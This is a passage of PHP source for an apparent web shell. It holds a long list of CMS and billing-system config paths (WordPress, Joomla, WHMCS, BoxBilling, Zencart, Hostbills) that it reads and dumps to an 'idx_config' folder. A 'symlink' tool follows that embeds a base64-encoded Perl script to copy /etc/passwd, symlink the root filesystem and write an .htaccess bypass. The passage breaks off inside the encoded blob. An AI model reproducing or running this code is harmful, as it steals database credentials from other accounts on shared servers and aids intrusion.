867 "$user_docroot/new/wp-config.php" => "Wordpress",
868 "$user_docroot/blogs/wp-config.php" => "Wordpress",
869 "$user_docroot/configuration.php" => "Joomla",
870 "$user_docroot/blog/configuration.php" => "Joomla",
871 "$user_docroot/submitticket.php" => "^WHMCS",
872 "$user_docroot/cms/configuration.php" => "Joomla",
873 "$user_docroot/beta/configuration.php" => "Joomla",
874 "$user_docroot/portal/configuration.php" => "Joomla",
875 "$user_docroot/site/configuration.php" => "Joomla",
876 "$user_docroot/main/configuration.php" => "Joomla",
877 "$user_docroot/home/configuration.php" => "Joomla",
878 "$user_docroot/demo/configuration.php" => "Joomla",
879 "$user_docroot/test/configuration.php" => "Joomla",
880 "$user_docroot/v1/configuration.php" => "Joomla",
881 "$user_docroot/v2/configuration.php" => "Joomla",
882 "$user_docroot/joomla/configuration.php" => "Joomla",
883 "$user_docroot/new/configuration.php" => "Joomla",
884 "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
885 "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
886 "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
887 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
888 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
889 "$user_docroot/WHMC/submitticket.php" => "WHMCS",
890 "$user_docroot/Whmc/submitticket.php" => "WHMCS",
891 "$user_docroot/whmc/submitticket.php" => "WHMCS",
892 "$user_docroot/WHM/submitticket.php" => "WHMCS",
893 "$user_docroot/Whm/submitticket.php" => "WHMCS",
894 "$user_docroot/whm/submitticket.php" => "WHMCS",
895 "$user_docroot/HOST/submitticket.php" => "WHMCS",
896 "$user_docroot/Host/submitticket.php" => "WHMCS",
897 "$user_docroot/host/submitticket.php" => "WHMCS",
898 "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
899 "$user_docroot/Supportes/submitticket.php" => "WHMCS",
900 "$user_docroot/supportes/submitticket.php" => "WHMCS",
901 "$user_docroot/domains/submitticket.php" => "WHMCS",
902 "$user_docroot/domain/submitticket.php" => "WHMCS",
903 "$user_docroot/Hosting/submitticket.php" => "WHMCS",
904 "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
905 "$user_docroot/hosting/submitticket.php" => "WHMCS",
906 "$user_docroot/CART/submitticket.php" => "WHMCS",
907 "$user_docroot/Cart/submitticket.php" => "WHMCS",
908 "$user_docroot/cart/submitticket.php" => "WHMCS",
909 "$user_docroot/ORDER/submitticket.php" => "WHMCS",
910 "$user_docroot/Order/submitticket.php" => "WHMCS",
911 "$user_docroot/order/submitticket.php" => "WHMCS",
912 "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
913 "$user_docroot/Client/submitticket.php" => "WHMCS",
914 "$user_docroot/client/submitticket.php" => "WHMCS",
915 "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
916 "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
917 "$user_docroot/clientarea/submitticket.php" => "WHMCS",
918 "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
919 "$user_docroot/Support/submitticket.php" => "WHMCS",
920 "$user_docroot/support/submitticket.php" => "WHMCS",
921 "$user_docroot/BILLING/submitticket.php" => "WHMCS",
922 "$user_docroot/Billing/submitticket.php" => "WHMCS",
923 "$user_docroot/billing/submitticket.php" => "WHMCS",
924 "$user_docroot/BUY/submitticket.php" => "WHMCS",
925 "$user_docroot/Buy/submitticket.php" => "WHMCS",
926 "$user_docroot/buy/submitticket.php" => "WHMCS",
927 "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
928 "$user_docroot/Manage/submitticket.php" => "WHMCS",
929 "$user_docroot/manage/submitticket.php" => "WHMCS",
930 "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
931 "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
932 "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
933 "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
934 "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
935 "$user_docroot/Checkout/submitticket.php" => "WHMCS",
936 "$user_docroot/checkout/submitticket.php" => "WHMCS",
937 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
938 "$user_docroot/Billings/submitticket.php" => "WHMCS",
939 "$user_docroot/billings/submitticket.php" => "WHMCS",
940 "$user_docroot/BASKET/submitticket.php" => "WHMCS",
941 "$user_docroot/Basket/submitticket.php" => "WHMCS",
942 "$user_docroot/basket/submitticket.php" => "WHMCS",
943 "$user_docroot/SECURE/submitticket.php" => "WHMCS",
944 "$user_docroot/Secure/submitticket.php" => "WHMCS",
945 "$user_docroot/secure/submitticket.php" => "WHMCS",
946 "$user_docroot/SALES/submitticket.php" => "WHMCS",
947 "$user_docroot/Sales/submitticket.php" => "WHMCS",
948 "$user_docroot/sales/submitticket.php" => "WHMCS",
949 "$user_docroot/BILL/submitticket.php" => "WHMCS",
950 "$user_docroot/Bill/submitticket.php" => "WHMCS",
951 "$user_docroot/bill/submitticket.php" => "WHMCS",
952 "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
953 "$user_docroot/Purchase/submitticket.php" => "WHMCS",
954 "$user_docroot/purchase/submitticket.php" => "WHMCS",
955 "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
956 "$user_docroot/Account/submitticket.php" => "WHMCS",
957 "$user_docroot/account/submitticket.php" => "WHMCS",
958 "$user_docroot/USER/submitticket.php" => "WHMCS",
959 "$user_docroot/User/submitticket.php" => "WHMCS",
960 "$user_docroot/user/submitticket.php" => "WHMCS",
961 "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
962 "$user_docroot/Clients/submitticket.php" => "WHMCS",
963 "$user_docroot/clients/submitticket.php" => "WHMCS",
964 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
965 "$user_docroot/Billings/submitticket.php" => "WHMCS",
966 "$user_docroot/billings/submitticket.php" => "WHMCS",
967 "$user_docroot/MY/submitticket.php" => "WHMCS",
968 "$user_docroot/My/submitticket.php" => "WHMCS",
969 "$user_docroot/my/submitticket.php" => "WHMCS",
970 "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
971 "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
972 "$user_docroot/panel/submitticket.php" => "WHMCS",
973 "$user_docroot/clientes/submitticket.php" => "WHMCS",
974 "$user_docroot/cliente/submitticket.php" => "WHMCS",
975 "$user_docroot/support/order/submitticket.php" => "WHMCS",
976 "$user_docroot/bb-config.php" => "BoxBilling",
977 "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
978 "$user_docroot/box/bb-config.php" => "BoxBilling",
979 "$user_docroot/host/bb-config.php" => "BoxBilling",
980 "$user_docroot/Host/bb-config.php" => "BoxBilling",
981 "$user_docroot/supportes/bb-config.php" => "BoxBilling",
982 "$user_docroot/support/bb-config.php" => "BoxBilling",
983 "$user_docroot/hosting/bb-config.php" => "BoxBilling",
984 "$user_docroot/cart/bb-config.php" => "BoxBilling",
985 "$user_docroot/order/bb-config.php" => "BoxBilling",
986 "$user_docroot/client/bb-config.php" => "BoxBilling",
987 "$user_docroot/clients/bb-config.php" => "BoxBilling",
988 "$user_docroot/cliente/bb-config.php" => "BoxBilling",
989 "$user_docroot/clientes/bb-config.php" => "BoxBilling",
990 "$user_docroot/billing/bb-config.php" => "BoxBilling",
991 "$user_docroot/billings/bb-config.php" => "BoxBilling",
992 "$user_docroot/my/bb-config.php" => "BoxBilling",
993 "$user_docroot/secure/bb-config.php" => "BoxBilling",
994 "$user_docroot/support/order/bb-config.php" => "BoxBilling",
995 "$user_docroot/includes/dist-configure.php" => "Zencart",
996 "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
997 "$user_docroot/products/includes/dist-configure.php" => "Zencart",
998 "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
999 "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
1000 "$user_docroot/includes/iso4217.php" => "Hostbills",
1001 "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
1002 "$user_docroot/host/includes/iso4217.php" => "Hostbills",
1003 "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
1004 "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
1005 "$user_docroot/support/includes/iso4217.php" => "Hostbills",
1006 "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
1007 "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
1008 "$user_docroot/order/includes/iso4217.php" => "Hostbills",
1009 "$user_docroot/client/includes/iso4217.php" => "Hostbills",
1010 "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
1011 "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
1012 "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
1013 "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
1014 "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
1015 "$user_docroot/my/includes/iso4217.php" => "Hostbills",
1016 "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
1017 "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
1018
1019 );
1020 foreach($getconfig as $config => $userconfig) {
1021 $get = file_get_contents($config);
1022 if($get == '') {
1023 }
1024 else {
1025 $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
1026 fputs($fopen, $get);
1027 }
1028 }
1029 }
1030 }
1031 }
1032 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
1033 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
1034 print "</div>";
1035 }
1036 elseif($toolsname === "symlink") {
1037 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
1038 if(!is_dir(path()."/idx_sym/")) {
1039 $sym['code'] = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjIA0KIw0KIwkJTmFtZSA6IFBlcmwvQ0dJIENvbmZpZyBTeW1saW5rZXIgKFdpdGggQXV0byBCeXBhc3MgU3ltbGluayA0MDQpDQojCQlWZXJzaW9uIDogMS4yDQojCQlDcmVhdGVkIDogOSBNZWkgMjAxNw0KIwkJQXV0aG9yIDogMHgxOTk5DQojCQlUaGFua3MgVG8gOiAweElEaW90ICwgSW5kb25lc2lhbiBDb2RlIFBhcnR5ICwgSmF0aW00dQ0KIwkJTW9yZSBJbmZvIDogaHR0cDovLzB4RGFyay5ibG9nc3BvdC5jb20NCiMJCVdhbnQgdG8gcmVjb2RlID8gRG9uJ3QgZm9yZ2V0IG15IG5pY2sgbmFtZSAgOikNCiMJCWh0dHA6Ly9mYWNlYm9vay5jb20vbWVsZXguMWQNCiMJCQ0KIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyANCg0KdXNlIEZpbGU6OkNvcHk7DQp1c2Ugc3RyaWN0Ow0KdXNlIHdhcm5pbmdzOw0KdXNlIE1JTUU6OkJhc2U2NDsNCmNvcHkoIi9ldGMvcGFzc3dkIiwicGFzc3dkLnR4dCIpIDsNCm1rZGlyICJpZHhfc3ltIjsNCnN5bWxpbmsoIi8iLCJpZHhfc3ltL3Jvb3QiKTsNCm15ICRmaWxlbmFtZSA9ICdwYXNzd2QudHh0JzsNCm15ICRodGFjY2VzcyA9IGRlY29kZV9iYXNlNjQoIlQzQjBhVzl1Y3lCSmJtUmxlR1Z6SUVadmJHeHZkMU41YlV4cGJtdHpEUXBFYVhKbFkzUnZjbmxKYm1SbGVDQnBibVJ2ZUhCc2IybDBMbWgwYlEwS1FXUmtWSGx3WlNCMFpYaDBMM0JzWVdsdUlDNXdhSEFnRFFwQlpHUklZVzVrYkdWeUlIUmxlSFF2Y0d4aGFXNGdMbkJvY0EwS1UyRjBhWE5tZVNCQmJua05Da2x1WkdWNFQzQjBhVzl1Y3lBclEyaGhjbk5sZEQxVlZFWXRPQ0FyUm1GdVkzbEpibVJsZUdsdVp5QXJTV2R1YjNKbFEyRnpaU0FyUm05c1pHVnljMFpwY25OMElDdFlTRlJOVENBclNGUk5URlJoWW14bElDdFRkWEJ3Y21WemMxSjFiR1Z6SUN0VGRYQndjbVZ6YzBSbGMyTnlhWEIwYVc5dUlDdE9ZVzFsVjJsa2RHZzlLaUFOQ2tGa1pFbGpiMjRnSjJSaGRHRTZhVzFoWjJVdmNHNW5PMkpoYzJVMk5DeHBWa0pQVW5jd1MwZG5iMEZCUVVGT1UxVm9SVlZuUVVGQlFrRkJRVUZCVVVOQldVRkJRVUZtT0M4NWFFRkJRVUZDU0U1RFUxWlJTVU5CWjBsbVFXaHJhVUZCUVVGQmJIZFRSbXg2UVVGQlRqRjNRVUZFWkdOQ1VXbHBZbVZCUVVGQlFtd3dVbFpvTUZVeU9XMWtTR1JvWTIxVlFXUXpaRE5NYld4MVlUTk9hbGxZUW14TWJUbDVXalYyZFZCQ2IwRkJRVVpWVTFWU1FsWkVhVTV3V2tzNVUyZE9Ra1pKV0ZCMldFNXVaR3BqVW05d1dEUlZOR3RYVm5JMVFVTm9WVGRJT0VKVFprbDBRVWhyUWpsRFdITnlWekJIZDBWUmRGSjNWa3ROVW5SQlZUaGFZMWxYWVU1dFRUSlBlSEY1ZVdsWldtUmpSMGxoV2pSYU56ZE5aV1ZSWTNjMlJFWkJMMVZFVlVGQldVaElhamhvVDBGVWFqbHZVbE5sTWxveFpqSkxhbEF4Wm1kTWEyNU5VRk0xYkZjd1ZtazBjRnB2Y0haSVdFUlhLMGxvVDNJNU9XZFlWSHByY2pseGRsUkNUWFJ5VG1RNFFYTk1WbU52YlZwTFJGQTJNV3RGVEdsb1IwbEtPVkZDWjA4eWFtUnpTVVV2U21JMVQyRmpSMFpCZDBSUlJXVk5SVTlhYm1neFJYRk5RMmgwVTBJNFlUWTBRbGN5VFU1b04xRldhV2hEUjB0alRraHpkMjFhTUd4QmExbEllRVkwVVdoQ1VFTkxTVmxTVlRsc05qQTFTMjFIUTBWSlZWbDZkRU5aVFVKbWEwVnFSMW8wVDJsSWQxSlJSaXQyYTFGSEszQjBRVU5KUmxKRlNsWlFVVUYyUm1ZclFuSnFiM2xSSzBOYVpuRnhNVEU0UkZKR1JXaHFaV0ppWW1Wc05tUkhhWGxVY1dZcmRsTnlhMkZTVVM4d2RYUk1OMjFJV0d3NWRuRXJaVkF6Vlc1aWFDOUlOV2RFUzJsUFJqWTNXV1ZpV1RCa1UwcGpVa0p0TUhveWNrWnNNbmxYY0RoQlZrUkpWek15WkdFM2NFeEJRVUZCUVVWc1JsUnJVM1ZSYlVOREp5QmVYa1JKVWtWRFZFOVNXVjVlRFFwRVpXWmhkV3gwU1dOdmJpQW5aR0YwWVRwcGJXRm5aUzl3Ym1jN1ltRnpaVFkwTEdsV1FrOVNkekJMUjJkdlFVRkJRVTVUVldoRlZXZEJRVUZDUVVGQlFVRlJRMEZaUVVGQlFXWTRMemxvUVVGQlFVRllUbE5TTUVsQmNuTTBZelpSUVVGQlFWcHBVekJrUlVGUU9FRXZkMFF2YjB3eWJtdDNRVUZCUVd4M1UwWnNla0ZCUVV4RmQwRkJRM2hOUWtGS2NXTkhRVUZCUVVGa01GTlZNVVpDT1c5S1FtaGpWRXAyTWtJeVpEUkJRVUZLVFZOVlVrSldSR3BNWWxwUE9WUm9lRnBGU1ZjdmNXeDJaSFJOTXpoQ1RtZEtVVzFSWjBwSFpDdEJMMDFSUWt4M1IycHBkMGd6Ym5ka2ExTk1kRTh5ZUVWU1J6Vk1jWGhZVWxOSlVqSlpSR1pFTkVkclIwMHdVRE55WWpSaU9WQkJlakJzTjNCVGJGZHNWekJtYm01TWIyeEJTVkJDTkZCWWFEUmxSblZ1ZFdOQlNVbE1kMlJGVTJWYWVVRnBabTV3Tml0MU9XOU9URzh6WjAwelRucFVaRWhTS3k4dmVuWktUWHBUZVVwTFMyOWthVWxuT0VGWVlYaGxTWG94WWtSYU4wMTRjVTVtZEdkVFZWSkVWM2szVEZWdVdqQmtXVzE0UVVaQlZrVnNTVFpCUlVONVowbHpVVkZ6YVhwTVFrOUJRa0ZFVDJwTFFYQnhhRGQxTjBkdlExVlhhWGRaWW1WMGIxVkljbkpRWTNkRGNXOUdNa3RWWlZoTWVrVjZRbll3SzNWUmJWTklUVVZhT1VZMlUxcGpjalpwTkVselFrOWhMMkkzU0ZGTllVaDBTVUYzWjB4a1NHRnNSRUV4WlhZd1pWRmlVMnB5UlhKUmQwcHdjVVkwWlVGNEwyaHZjVVF4TXpKdFRXdEtjbWsxZFZOUGJFWm9SV2h3VlZGSmFXOXFkMkZ0VDBST2MyeHFabFZYUTNGd1RHNVBZV0ZEVTB0S2RHNWhRa056V2xscVFXeHNiVmhKTkhaaFpXOWhWbGd3WTJKVFpHaHRWVkl6ZWtGTGRrNXFXVFpXYVc5dk1IUlhlbWRGYjI1TFlsY3JTMnRIVjNRelZXNTBNRU5sUjJaS2N6bG5LMVZWTUhKRlIwaElMMGgzTDAxcVNEWXZWQ3RRVDJSR2IxSk9TME5vVFRJeWVHMVBVR1Z6Y0dwUVIxRTJTSEJPVVRJM2REWnpRVU5FVTA1aGJubHZiR3BFVEVWa1ZtRkdUMHhsT0ZwclZXcExOWFZyY1ROME56bHNVRU0zTDA5RWF6VkhZU3RaTms4MVRYRjViVTUzTTFZeGVUTm9lWHBtV0RCb2NYWktUSGxpV0Vaa0t5dG1NbVF6WkRCa2JYTXJjWFpuTkU5RWVqaG1TSGd3TDB4elltVXpPVFkwYzFNM0t6UjFSV3AxYm5CeGJWTmxObVV6UkROT05TOU9NRmRhWW5Sc2VUbG1NRGx1V2pKYUwySXlPWFl5Wmt4RlpYWjJTemx4ZGpkak1uUnZTMms0VldscFVXbHhTR0p0Tm5KcFZ6WmhNVE5tYml0NmRqY3pLMjl4YjNKb1kweG5TMVZHV0ZaUUsyWnVOVElyVEc5dWFqaEpURW93VURoYVNVTkRSamt2VUZSd1EyeG9jRUoyWjFCbGJHOU1PVlUxTlU1SlFVRkJRVUZCVTFWV1QxSkxOVU5aU1VrOUp3MEtTVzVrWlhoSloyNXZjbVVnS2k1MGVIUTBNRFFOQ2tsdVpHVjRVM1I1YkdWVGFHVmxkQ0FuYUhSMGNEb3ZMMlYyWlc1MExtbHVaRzk0Y0d4dmFYUXViM0l1YVdRdmMzbHRiR2x1YXk1amMzTW5EUXBTWlhkeWFYUmxSVzVuYVc1bElFOXVEUXBTWlhkeWFYUmxRMjl1WkNBbGUxSkZVVlZGVTFSZlJrbE1SVTVCVFVWOUlGNHVLakI0YzNsdE5EQTBJRnRPUTEwTkNsSmxkM0pwZEdWU2RXeGxJRnd1ZEhoMEpDQWxlMUpGVVZWRlUxUmZWVkpKZlRRd05DQmJUQ3hTUFRNd01pNU9RMTA9Iik7DQpteSAkc3ltID0gZGVjb2RlX2Jhc2U2NCgiVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCcGJtUnZlSEJzYjJsMExtaDBiUTBLU0dWaFpHVnlUbUZ0WlNBd2VERTVPVGt1ZEhoMERRcFRZWFJwYzJaNUlFRnVlUTBLU1c1a1pYaFBjSFJwYjI1eklFbG5ibTl5WlVOaGMyVWdSbUZ1WTNsSmJtUmxlR2x1WnlCR2IyeGtaWEp6Um1seWMzUWdUbUZ0WlZkcFpIUm9QU29nUkdWelkzSnBjSFJwYjI1WGFXUjBhRDBxSUZOMWNIQnlaWE56U0ZSTlRGQnlaV0Z0WW14bERRcEpibVJsZUVsbmJtOXlaU0FxRFFwSmJtUmxlRk4wZVd4bFUyaGxaWFFnSjJoMGRIQTZMeTlsZG1WdWRDNXBibVJ2ZUhCc2IybDBMbTl5TG1sa0wzTjViV3hwYm1zdVkzTnpKdz09Iik7DQpvcGVuKG15ICRmaDEsICc+JywgJ2lkeF9zeW0vLmh0YWNjZXNzJyk7DQpwcmludCAkZmgxICIkaHRhY2Nlc3MiOw0KY2xvc2UgJGZoMTsNCm9wZW4obXkgJHh4LCAnPicsICdpZHhfc3ltL25lbXUudHh0Jyk7DQpwcmludCAkeHggIiRzeW0iOw0KY2xvc2UgJHh4Ow0Kb3BlbihteSAkZmgsICc8OmVuY29kaW5nKFVURi04KScsICRmaWxlbmFtZSk7DQp3aGlsZSAobXkgJHJvdyA9IDwkZmg+KSB7DQpteSBAbWF0Y2hlcyA9ICRyb3cgPX4gLyguKj8pOng6L2c7DQpteSAkdXNlcm55YSA9ICQxOw0KbXkgQGFycmF5ID0gKA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy8uYWNjZXNzaGFzaCcsIHR5cGUgPT4gJ1dITS1hY2Nlc3NoYXNoJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jb25maWcva29uZWtzaS5waHAnLCB0eXBlID0+ICdMb2tvbWVkaWEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NvbmZpZy9zZXR0aW5ncy5pbmMucGhwJywgdHlwZSA9PiAnUHJlc3RhU2hvcCcgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYXBwL2V0Yy9sb2NhbC54bWwnLCB0eXBlID0+ICdNYWdlbnRvJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywgdHlwZSA9PiAnT3BlbkNhcnQnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCB0eXBlID0+ICdFbGxpc2xhYicgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3AvdGVzdC93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvcG9ydGFsL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV1Avd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbmV3cy93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9kZW1vL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjEvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjIvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbmV3L3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ibG9nL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnXldITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3BvcnRhbC9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvZGVtby9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdGVzdC9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjEvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3YyL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1s